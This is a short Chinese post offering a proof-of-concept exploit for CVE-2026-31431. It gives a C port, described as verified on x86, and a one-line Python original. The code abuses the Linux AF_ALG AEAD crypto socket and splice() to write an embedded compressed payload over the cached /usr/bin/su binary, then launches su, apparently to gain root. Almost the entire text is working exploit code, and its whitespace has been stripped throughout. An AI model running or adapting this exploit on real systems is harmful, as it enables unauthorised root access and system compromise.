CVE-2026-31431 PoC（含C代码的PoC）

C代码PoC

已在x86机器验证OK。

#include<stdio.h>#include<stdlib.h>#include<string.h>#include<unistd.h>#include<fcntl.h>#include<sys/socket.h>#include<linux/if_alg.h>#include<zlib.h>#include<errno.h>#include<sys/syscall.h>#include<asm/unistd.h>#ifndefSPLICE_F_MOVE#defineSPLICE_F_MOVE0x01#endif#ifndefMSG_MORE#defineMSG_MORE0x8000#endifssize_tmy_splice(intfd_in,loff_t*off_in,intfd_out,loff_t*off_out,size_tlen,unsignedintflags){returnsyscall(__NR_splice,fd_in,off_in,fd_out,off_out,len,flags);}unsignedchar*hex_to_bytes(constchar*hex,size_t*out_len){size_tlen=strlen(hex);if(len%2!=0)returnNULL;size_tbytes_len=len/2;unsignedchar*bytes=(unsignedchar*)malloc(bytes_len);if(!bytes)returnNULL;for(size_ti=0;i<bytes_len;i++){unsignedintbyte;if(sscanf(hex+2*i,"%2x",&byte)!=1){free(bytes);returnNULL;}bytes[i]=(unsignedchar)byte;}*out_len=bytes_len;returnbytes;}unsignedchar*decompress_data(constunsignedchar*compressed,size_tcomp_len,size_t*out_len){uLongf dest_len=comp_len*10;unsignedchar*decompressed=(unsignedchar*)malloc(dest_len);if(!decompressed)returnNULL;if(uncompress(decompressed,&dest_len,compressed,comp_len)!=Z_OK){free(decompressed);returnNULL;}*out_len=dest_len;returndecompressed;}// 对应 Python: def c(f, t, c)voiddo_crypto_op(intf_fd,intt,constunsignedchar*c_val){// a = s.socket(38, 5, 0) -> AF_ALG, SOCK_SEQPACKETinta_fd=socket(AF_ALG,SOCK_SEQPACKET,0);if(a_fd<0)return;// a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))structsockaddr_algsa;memset(&sa,0,sizeof(sa));sa.salg_family=AF_ALG;memcpy(sa.salg_type,"aead",5);memcpy(sa.salg_name,"authencesn(hmac(sha256),cbc(aes))",33);if(bind(a_fd,(structsockaddr*)&sa,sizeof(sa))<0){close(a_fd);return;}// h = 279 (SOL_ALG)inth=SOL_ALG;// v(h, 1, d('0800010000000010' + '0'*64))// key = 0800010000000010 (8 bytes) + 00*32 (32 bytes) = 40 bytesconstchar*key_hex="0800010000000010""000000000000000000000000000000000000000000000000000000000000000000000000";size_tkey_len;unsignedchar*key_bytes=hex_to_bytes(key_hex,&key_len);if(key_bytes){setsockopt(a_fd,h,ALG_SET_KEY,key_bytes,key_len);free(key_bytes);}// v(h, 5, None, 4) -> ALG_SET_AEAD_AUTHSIZE, 4字节零缓冲unsignedintauthsize=0;setsockopt(a_fd,h,ALG_SET_AEAD_AUTHSIZE,&authsize,sizeof(authsize));// u,_ = a.accept()intu_fd=accept(a_fd,NULL,NULL);if(u_fd<0){close(a_fd);return;}// o = t + 4into=t+4;// i = d('00') = b'\x00' (1 byte)// sendmsg 数据: [b"A"*4 + c]unsignedcharmsg[8];memset(msg,'A',4);memcpy(msg+4,c_val,4);// 构建辅助数据:// (h, 3, i*4) -> ALG_SET_OP, 4字节零 = ALG_OP_DECRYPT// (h, 2, b'\x10'+i*19) -> ALG_SET_IV, struct af_alg_iv{ivlen=16, iv=16*0}// (h, 4, b'\x08'+i*3) -> ALG_SET_AEAD_ASSOCLEN, 4字节 = 8 (LE)structioveciov;iov.iov_base=msg;iov.iov_len=8;// b"A"*4 + c (4 bytes)// CMSG 空间: ALG_SET_OP(4) + ALG_SET_IV(20=sizeof(af_alg_iv)+4) + ALG_SET_AEAD_ASSOCLEN(4)charcmsg_buf[CMSG_SPACE(4)+CMSG_SPACE(20)+CMSG_SPACE(4)];structmsghdrmsgh;memset(&msgh,0,sizeof(msgh));memset(cmsg_buf,0,sizeof(cmsg_buf));msgh.msg_iov=&iov;msgh.msg_iovlen=1;msgh.msg_control=cmsg_buf;msgh.msg_controllen=sizeof(cmsg_buf);// cmsg 1: ALG_SET_OP = 3, value = 0 (ALG_OP_DECRYPT)structcmsghdr*cmsg=CMSG_FIRSTHDR(&msgh);cmsg->cmsg_len=CMSG_LEN(4);cmsg->cmsg_level=h;cmsg->cmsg_type=ALG_SET_OP;unsignedintop_val=ALG_OP_DECRYPT;// 0memcpy(CMSG_DATA(cmsg),&op_val,4);// cmsg 2: ALG_SET_IV = 2, struct af_alg_iv { ivlen=16, iv[0..15]=0 }cmsg=CMSG_NXTHDR(&msgh,cmsg);cmsg->cmsg_len=CMSG_LEN(20);cmsg->cmsg_level=h;cmsg->cmsg_type=ALG_SET_IV;structaf_alg_iv*iv=(structaf_alg_iv*)CMSG_DATA(cmsg);iv->ivlen=16;memset(iv->iv,0,16);// cmsg 3: ALG_SET_AEAD_ASSOCLEN = 4, value = 8cmsg=CMSG_NXTHDR(&msgh,cmsg);cmsg->cmsg_len=CMSG_LEN(4);cmsg->cmsg_level=h;cmsg->cmsg_type=ALG_SET_AEAD_ASSOCLEN;unsignedintassoclen=8;memcpy(CMSG_DATA(cmsg),&assoclen,4);// u.sendmsg([b"A"*4+c], [...], 32768)// flags = 32768 = MSG_MOREsendmsg(u_fd,&msgh,MSG_MORE);// r, w = g.pipe()intpipefd[2];if(pipe(pipefd)<0){close(u_fd);close(a_fd);return;}// n(f, w, o, offset_src=0) -> splice(f, &offset=0, pipe_w, NULL, o, 0)loff_toffset=0;my_splice(f_fd,&offset,pipefd[1],NULL,o,SPLICE_F_MOVE);// n(r, u.fileno(), o) -> splice(pipe_r, NULL, u_fd, NULL, o, 0)my_splice(pipefd[0],NULL,u_fd,NULL,o,SPLICE_F_MOVE);// try: u.recv(8+t) except: passunsignedcharrecv_buf[168];// 8 + max(t=156) = 164, 分配大一些recv(u_fd,recv_buf,8+t,0);close(pipefd[0]);close(pipefd[1]);close(u_fd);close(a_fd);}intmain(intargc__attribute__((unused)),char*argv[]__attribute__((unused))){// f = g.open("/usr/bin/su", 0) -> O_RDONLYintf_fd=open("/usr/bin/su",O_RDONLY);if(f_fd<0){perror("open");return1;}// e = zlib.decompress(d(...))constchar*compressed_hex="78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3";size_tcomp_len;unsignedchar*compressed=hex_to_bytes(compressed_hex,&comp_len);if(!compressed){close(f_fd);return1;}size_tdecomp_len;unsignedchar*e=decompress_data(compressed,comp_len,&decomp_len);free(compressed);if(!e){close(f_fd);return1;}// while i < len(e): c(f, i, e[i:i+4]); i += 4size_ti=0;while(i<decomp_len){unsignedcharchunk[4];size_tremaining=decomp_len-i;if(remaining>=4){memcpy(chunk,e+i,4);}else{memset(chunk,0,4);memcpy(chunk,e+i,remaining);}do_crypto_op(f_fd,(int)i,chunk);i+=4;}free(e);close(f_fd);// g.system("su")system("su");return0;}

Python PoC

官方链接：https://copy.fail/#exploit

#!/usr/bin/env python3importosasg,zlib,socketassdefd(x):returnbytes.fromhex(x)defc(f,t,c):a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)try:u.recv(8+t)except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))whilei<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")